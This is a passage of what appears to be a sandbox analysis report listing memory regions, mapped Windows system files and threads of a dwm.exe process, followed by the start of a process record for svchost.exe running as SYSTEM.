0xca542f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca542e0000" filename = "" Region: id = 2877 start_va = 0xca54300000 end_va = 0xca5437ffff entry_point = 0x0 region_type = private name = "private_0x000000ca54300000" filename = "" Region: id = 2878 start_va = 0xca54380000 end_va = 0xca54383fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca54380000" filename = "" Region: id = 2879 start_va = 0xca54390000 end_va = 0xca54392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca54390000" filename = "" Region: id = 2880 start_va = 0xca543a0000 end_va = 0xca543a1fff entry_point = 0x0 region_type = private name = "private_0x000000ca543a0000" filename = "" Region: id = 2881 start_va = 0xca543b0000 end_va = 0xca5446dfff entry_point = 0xca543b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2882 start_va = 0xca54470000 end_va = 0xca54470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca54470000" filename = "" Region: id = 2883 start_va = 0xca54480000 end_va = 0xca54480fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca54480000" filename = "" Region: id = 2884 start_va = 0xca54490000 end_va = 0xca54494fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca54490000" filename = "" Region: id = 2885 start_va = 0xca544f0000 end_va = 0xca544f6fff entry_point = 0x0 region_type = private name = "private_0x000000ca544f0000" filename = "" Region: id = 2886 start_va = 0xca54500000 end_va = 0xca54501fff entry_point = 0xca54500000 region_type = mapped_file name = "dwm.exe.mui" filename = "\\Windows\\System32\\en-US\\dwm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\dwm.exe.mui") Region: id = 2887 start_va = 0xca54510000 end_va = 0xca54510fff entry_point = 0x0 region_type = private name = "private_0x000000ca54510000" filename = "" Region: id = 2888 start_va = 0xca54520000 end_va = 0xca54520fff entry_point = 0x0 region_type = private name = "private_0x000000ca54520000" filename = "" Region: id = 2889 start_va = 0xca54530000 end_va = 0xca54530fff entry_point = 0x0 region_type = private name = "private_0x000000ca54530000" filename = "" Region: id = 2890 start_va = 0xca54540000 end_va = 0xca5454ffff entry_point = 0x0 region_type = private name = "private_0x000000ca54540000" filename = "" Region: id = 2891 start_va = 0xca54550000 end_va = 0xca54550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca54550000" filename = "" Region: id = 2892 start_va = 0xca54560000 end_va = 0xca54560fff entry_point = 0x0 region_type = private name = "private_0x000000ca54560000" filename = "" Region: id = 2893 start_va = 0xca54570000 end_va = 0xca5466ffff entry_point = 0x0 region_type = private name = "private_0x000000ca54570000" filename = "" Region: id = 2894 start_va = 0xca54670000 end_va = 0xca547f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca54670000" filename = "" Region: id = 2895 start_va = 0xca54800000 end_va = 0xca54829fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca54800000" filename = "" Region: id = 2896 start_va = 0xca54830000 end_va = 0xca5483ffff entry_point = 0x0 region_type = private name = "private_0x000000ca54830000" filename = "" Region: id = 2897 start_va = 0xca54840000 end_va = 0xca549c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca54840000" filename = "" Region: id = 2898 start_va = 0xca549d0000 end_va = 0xca55dcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca549d0000" filename = "" Region: id = 2899 start_va = 0xca55e50000 end_va = 0xca55e50fff entry_point = 0x0 region_type = private name = "private_0x000000ca55e50000" filename = "" Region: id = 2900 start_va = 0xca55e60000 end_va = 0xca55e63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca55e60000" filename = "" Region: id = 2901 start_va = 0xca55e70000 end_va = 0xca55e7ffff entry_point = 0x0 region_type = private name = "private_0x000000ca55e70000" filename = "" Region: id = 2902 start_va = 0xca55e80000 end_va = 0xca561b6fff entry_point = 0xca55e80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2903 start_va = 0xca561c0000 end_va = 0xca5623ffff entry_point = 0x0 region_type = private name = "private_0x000000ca561c0000" filename = "" Region: id = 2904 start_va = 0xca56240000 end_va = 0xca562bffff entry_point = 0x0 region_type = private name = "private_0x000000ca56240000" filename = "" Region: id = 2905 start_va = 0xca562c0000 end_va = 0xca56abffff entry_point = 0x0 region_type = private name = "private_0x000000ca562c0000" filename = "" Region: id = 2906 start_va = 0xca56ac0000 end_va = 0xca56b77fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca56ac0000" filename = "" Region: id = 2907 start_va = 0xca56b80000 end_va = 0xca56b86fff entry_point = 0x0 region_type = private name = "private_0x000000ca56b80000" filename = "" Region: id = 2908 start_va = 0xca56b90000 end_va = 0xca56cb1fff entry_point = 0xca56b90000 region_type = mapped_file name = "aero.msstyles" filename = "\\Windows\\Resources\\Themes\\aero\\aero.msstyles" (normalized: "c:\\windows\\resources\\themes\\aero\\aero.msstyles") Region: id = 2909 start_va = 0xca56cc0000 end_va = 0xca56dbffff entry_point = 0x0 region_type = private name = "private_0x000000ca56cc0000" filename = "" Region: id = 2910 start_va = 0xca56dc0000 end_va = 0xca56e3ffff entry_point = 0x0 region_type = private name = "private_0x000000ca56dc0000" filename = "" Region: id = 2911 start_va = 0xca56e40000 end_va = 0xca56e40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca56e40000" filename = "" Region: id = 2912 start_va = 0xca56e50000 end_va = 0xca56e50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca56e50000" filename = "" Region: id = 2913 start_va = 0xca56e60000 end_va = 0xca56e77fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca56e60000" filename = "" Region: id = 2914 start_va = 0xca56e80000 end_va = 0xca56eaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca56e80000" filename = "" Region: id = 2915 start_va = 0xca56eb0000 end_va = 0xca56faffff entry_point = 0x0 region_type = private name = "private_0x000000ca56eb0000" filename = "" Region: id = 2916 start_va = 0xca56fb0000 end_va = 0xca56fb0fff entry_point = 0x0 region_type = private name = "private_0x000000ca56fb0000" filename = "" Region: id = 2917 start_va = 0xca56fc0000 end_va = 0xca56fc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca56fc0000" filename = "" Region: id = 2918 start_va = 0xca56fd0000 end_va = 0xca5704ffff entry_point = 0x0 region_type = private name = "private_0x000000ca56fd0000" filename = "" Region: id = 2919 start_va = 0xca57050000 end_va = 0xca570cffff entry_point = 0x0 region_type = private name = "private_0x000000ca57050000" filename = "" Region: id = 2920 start_va = 0xca570d0000 end_va = 0xca5714ffff entry_point = 0x0 region_type = private name = "private_0x000000ca570d0000" filename = "" Region: id = 2921 start_va = 0xca57150000 end_va = 0xca57150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca57150000" filename = "" Region: id = 2922 start_va = 0xca57160000 end_va = 0xca57160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca57160000" filename = "" Region: id = 2923 start_va = 0xca57170000 end_va = 0xca57170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca57170000" filename = "" Region: id = 2924 start_va = 0xca57180000 end_va = 0xca57180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca57180000" filename = "" Region: id = 2925 start_va = 0xca57190000 end_va = 0xca57190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca57190000" filename = "" Region: id = 2926 start_va = 0xca571a0000 end_va = 0xca571e1fff entry_point = 0xca571a0000 region_type = mapped_file name = "d2d1.dll.mui" filename = "\\Windows\\System32\\en-US\\d2d1.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\d2d1.dll.mui") Region: id = 2927 start_va = 0xca571f0000 end_va = 0xca576e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca571f0000" filename = "" Region: id = 2928 start_va = 0xca576f0000 end_va = 0xca57aeffff entry_point = 0x0 region_type = private name = "private_0x000000ca576f0000" filename = "" Region: id = 2929 start_va = 0xca57af0000 end_va = 0xca57af0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca57af0000" filename = "" Region: id = 2930 start_va = 0xca57b00000 end_va = 0xca57b00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca57b00000" filename = "" Region: id = 2931 start_va = 0xca57b10000 end_va = 0xca57b48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca57b10000" filename = "" Region: id = 2932 start_va = 0xca57b50000 end_va = 0xca58041fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca57b50000" filename = "" Region: id = 2933 start_va = 0xca58050000 end_va = 0xca58050fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca58050000" filename = "" Region: id = 2934 start_va = 0xca58060000 end_va = 0xca58060fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca58060000" filename = "" Region: id = 2935 start_va = 0xca58070000 end_va = 0xca58070fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca58070000" filename = "" Region: id = 2936 start_va = 0xca58080000 end_va = 0xca58080fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca58080000" filename = "" Region: id = 2937 start_va = 0xca580a0000 end_va = 0xca580a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca580a0000" filename = "" Region: id = 2938 start_va = 0xca580b0000 end_va = 0xca580b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca580b0000" filename = "" Region: id = 2939 start_va = 0xca580c0000 end_va = 0xca580c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca580c0000" filename = "" Region: id = 2940 start_va = 0xca580f0000 end_va = 0xca585e1fff entry_point = 0x0 region_type = private name = "private_0x000000ca580f0000" filename = "" Region: id = 2941 start_va = 0xca585f0000 end_va = 0xca58ae1fff entry_point = 0x0 region_type = private name = "private_0x000000ca585f0000" filename = "" Region: id = 2942 start_va = 0xca58af0000 end_va = 0xca58af0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca58af0000" filename = "" Region: id = 2943 start_va = 0xca58b00000 end_va = 0xca58b00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca58b00000" filename = "" Region: id = 2944 start_va = 0xca58b20000 end_va = 0xca58b20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca58b20000" filename = "" Region: id = 2945 start_va = 0xca58b30000 end_va = 0xca58b30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca58b30000" filename = "" Region: id = 2946 start_va = 0xca58b60000 end_va = 0xca58b63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca58b60000" filename = "" Region: id = 2947 start_va = 0xca58b70000 end_va = 0xca58b73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca58b70000" filename = "" Region: id = 2948 start_va = 0xca58ba0000 end_va = 0xca58d9ffff entry_point = 0x0 region_type = private name = "private_0x000000ca58ba0000" filename = "" Region: id = 2949 start_va = 0xca58da0000 end_va = 0xca58daffff entry_point = 0x0 region_type = private name = "private_0x000000ca58da0000" filename = "" Region: id = 2950 start_va = 0xca58db0000 end_va = 0xca58dbffff entry_point = 0x0 region_type = private name = "private_0x000000ca58db0000" filename = "" Region: id = 2951 start_va = 0xca58dc0000 end_va = 0xca58dcffff entry_point = 0x0 region_type = private name = "private_0x000000ca58dc0000" filename = "" Region: id = 2952 start_va = 0xca590f0000 end_va = 0xca590f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca590f0000" filename = "" Region: id = 2953 start_va = 0xca59110000 end_va = 0xca59113fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca59110000" filename = "" Region: id = 2954 start_va = 0xca59120000 end_va = 0xca59123fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca59120000" filename = "" Region: id = 2955 start_va = 0xca59130000 end_va = 0xca5932efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca59130000" filename = "" Region: id = 2956 start_va = 0xca59330000 end_va = 0xca5933ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca59330000" filename = "" Region: id = 2957 start_va = 0xca59340000 end_va = 0xca5934ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca59340000" filename = "" Region: id = 2958 start_va = 0xca59350000 end_va = 0xca5935ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca59350000" filename = "" Region: id = 2959 start_va = 0xca59360000 end_va = 0xca5936ffff entry_point = 0x0 region_type = private name = "private_0x000000ca59360000" filename = "" Region: id = 2960 start_va = 0xca59370000 end_va = 0xca5937ffff entry_point = 0x0 region_type = private name = "private_0x000000ca59370000" filename = "" Region: id = 2961 start_va = 0xca59380000 end_va = 0xca593bffff entry_point = 0x0 region_type = private name = "private_0x000000ca59380000" filename = "" Region: id = 2962 start_va = 0xca593c0000 end_va = 0xca593cffff entry_point = 0x0 region_type = private name = "private_0x000000ca593c0000" filename = "" Region: id = 2963 start_va = 0xca593e0000 end_va = 0xca593effff entry_point = 0x0 region_type = private name = "private_0x000000ca593e0000" filename = "" Region: id = 2964 start_va = 0xca59640000 end_va = 0xca5983efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ca59640000" filename = "" Region: id = 2965 start_va = 0xca598f0000 end_va = 0xca5a92ffff entry_point = 0xca598f0000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 2966 start_va = 0xca5ad90000 end_va = 0xca5af1bfff entry_point = 0x0 region_type = private name = "private_0x000000ca5ad90000" filename = "" Region: id = 2967 start_va = 0xca5af20000 end_va = 0xca5b01ffff entry_point = 0x0 region_type = private name = "private_0x000000ca5af20000" filename = "" Region: id = 2968 start_va = 0xca5b020000 end_va = 0xca5b11ffff entry_point = 0x0 region_type = private name = "private_0x000000ca5b020000" filename = "" Region: id = 2969 start_va = 0xca5b120000 end_va = 0xca5b19ffff entry_point = 0x0 region_type = private name = "private_0x000000ca5b120000" filename = "" Region: id = 2970 start_va = 0xca5b1a0000 end_va = 0xca5b21ffff entry_point = 0x0 region_type = private name = "private_0x000000ca5b1a0000" filename = "" Region: id = 2971 start_va = 0xca5b220000 end_va = 0xca5b29ffff entry_point = 0x0 region_type = private name = "private_0x000000ca5b220000" filename = "" Region: id = 2972 start_va = 0xca5b2c0000 end_va = 0xca5b2c6fff entry_point = 0x0 region_type = private name = "private_0x000000ca5b2c0000" filename = "" Region: id = 2973 start_va = 0x7df5ffaa0000 end_va = 0x7ff5ffa9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffaa0000" filename = "" Region: id = 2974 start_va = 0x7ff7d1a20000 end_va = 0x7ff7d1a2ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7d1a20000" filename = "" Region: id = 2975 start_va = 0x7ff7d1a30000 end_va = 0x7ff7d1a3ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7d1a30000" filename = "" Region: id = 2976 start_va = 0x7ff7d1a40000 end_va = 0x7ff7d1a4ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7d1a40000" filename = "" Region: id = 2977 start_va = 0x7ff7d1a58000 end_va = 0x7ff7d1a59fff entry_point = 0x0 region_type = private name = "private_0x00007ff7d1a58000" filename = "" Region: id = 2978 start_va = 0x7ff7d1a5a000 end_va = 0x7ff7d1a5bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7d1a5a000" filename = "" Region: id = 2979 start_va = 0x7ff7d1a5c000 end_va = 0x7ff7d1a5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7d1a5c000" filename = "" Region: id = 2980 start_va = 0x7ff7d1a5e000 end_va = 0x7ff7d1a5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7d1a5e000" filename = "" Region: id = 2981 start_va = 0x7ff7d1a60000 end_va = 0x7ff7d1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7d1a60000" filename = "" Region: id = 2982 start_va = 0x7ff7d1b60000 end_va = 0x7ff7d1b82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7d1b60000" filename = "" Region: id = 2983 start_va = 0x7ff7d1b83000 end_va = 0x7ff7d1b83fff entry_point = 0x0 region_type = private name = "private_0x00007ff7d1b83000" filename = "" Region: id = 2984 start_va = 0x7ff7d1b84000 end_va = 0x7ff7d1b85fff entry_point = 0x0 region_type = private name = "private_0x00007ff7d1b84000" filename = "" Region: id = 2985 start_va = 0x7ff7d1b86000 end_va = 0x7ff7d1b87fff entry_point = 0x0 region_type = private name = "private_0x00007ff7d1b86000" filename = "" Region: id = 2986 start_va = 0x7ff7d1b8a000 end_va = 0x7ff7d1b8bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7d1b8a000" filename = "" Region: id = 2987 start_va = 0x7ff7d1b8e000 end_va = 0x7ff7d1b8ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7d1b8e000" filename = "" Region: id = 2988 start_va = 0x7ff7d2b20000 end_va = 0x7ff7d2b32fff entry_point = 0x7ff7d2b20000 region_type = mapped_file name = "dwm.exe" filename = "\\Windows\\System32\\dwm.exe" (normalized: "c:\\windows\\system32\\dwm.exe") Region: id = 2989 start_va = 0x7ffaef4e0000 end_va = 0x7ffaef506fff entry_point = 0x7ffaef4e0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 2990 start_va = 0x7ffaef9c0000 end_va = 0x7ffaef9f5fff entry_point = 0x7ffaef9c0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2991 start_va = 0x7ffaefcd0000 end_va = 0x7ffaf0214fff entry_point = 0x7ffaefcd0000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 2992 start_va = 0x7ffaf0ac0000 end_va = 0x7ffaf0acafff entry_point = 0x7ffaf0ac0000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2993 start_va = 0x7ffaf1ce0000 end_va = 0x7ffaf1d2afff entry_point = 0x7ffaf1ce0000 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 2994 start_va = 0x7ffaf1d30000 end_va = 0x7ffaf1ee1fff entry_point = 0x7ffaf1d30000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 2995 start_va = 0x7ffaf1ef0000 end_va = 0x7ffaf215dfff entry_point = 0x7ffaf1ef0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 2996 start_va = 0x7ffaf2160000 end_va = 0x7ffaf21fbfff entry_point = 0x7ffaf2160000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 2997 start_va = 0x7ffaf2200000 end_va = 0x7ffaf24a2fff entry_point = 0x7ffaf2200000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 2998 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2999 start_va = 0x7ffaf24e0000 end_va = 0x7ffaf24f5fff entry_point = 0x7ffaf24e0000 region_type = mapped_file name = "dwmghost.dll" filename = "\\Windows\\System32\\dwmghost.dll" (normalized: "c:\\windows\\system32\\dwmghost.dll") Region: id = 3000 start_va = 0x7ffaf2500000 end_va = 0x7ffaf255bfff entry_point = 0x7ffaf2500000 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 3001 start_va = 0x7ffaf2560000 end_va = 0x7ffaf2627fff entry_point = 0x7ffaf2560000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 3002 start_va = 0x7ffaf2630000 end_va = 0x7ffaf2700fff entry_point = 0x7ffaf2630000 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 3003 start_va = 0x7ffaf2710000 end_va = 0x7ffaf28e3fff entry_point = 0x7ffaf2710000 region_type = mapped_file name = "dwmcore.dll" filename = "\\Windows\\System32\\dwmcore.dll" (normalized: "c:\\windows\\system32\\dwmcore.dll") Region: id = 3004 start_va = 0x7ffaf28f0000 end_va = 0x7ffaf29c2fff entry_point = 0x7ffaf28f0000 region_type = mapped_file name = "udwm.dll" filename = "\\Windows\\System32\\uDWM.dll" (normalized: "c:\\windows\\system32\\udwm.dll") Region: id = 3005 start_va = 0x7ffaf29d0000 end_va = 0x7ffaf29fbfff entry_point = 0x7ffaf29d0000 region_type = mapped_file name = "dwmredir.dll" filename = "\\Windows\\System32\\dwmredir.dll" (normalized: "c:\\windows\\system32\\dwmredir.dll") Region: id = 3006 start_va = 0x7ffaf2b90000 end_va = 0x7ffaf2c07fff entry_point = 0x7ffaf2b90000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 3007 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3008 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3009 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3010 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3011 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3012 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3013 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3014 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3015 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3016 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3017 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3018 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3019 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3020 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3021 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3022 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3023 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3024 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6405 start_va = 0xca58dd0000 end_va = 0xca5902dfff entry_point = 0x0 region_type = private name = "private_0x000000ca58dd0000" filename = "" Thread: id = 387 os_tid = 0x4fc Thread: id = 388 os_tid = 0x4f8 Thread: id = 389 os_tid = 0x4f4 Thread: id = 390 os_tid = 0x314 Thread: id = 391 os_tid = 0x308 Thread: id = 392 os_tid = 0x30c Thread: id = 393 os_tid = 0x300 Thread: id = 394 os_tid = 0x2fc Thread: id = 395 os_tid = 0x2e0 Process: id = "43" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x47a8d000" os_pid = "0x318" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b566" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2145 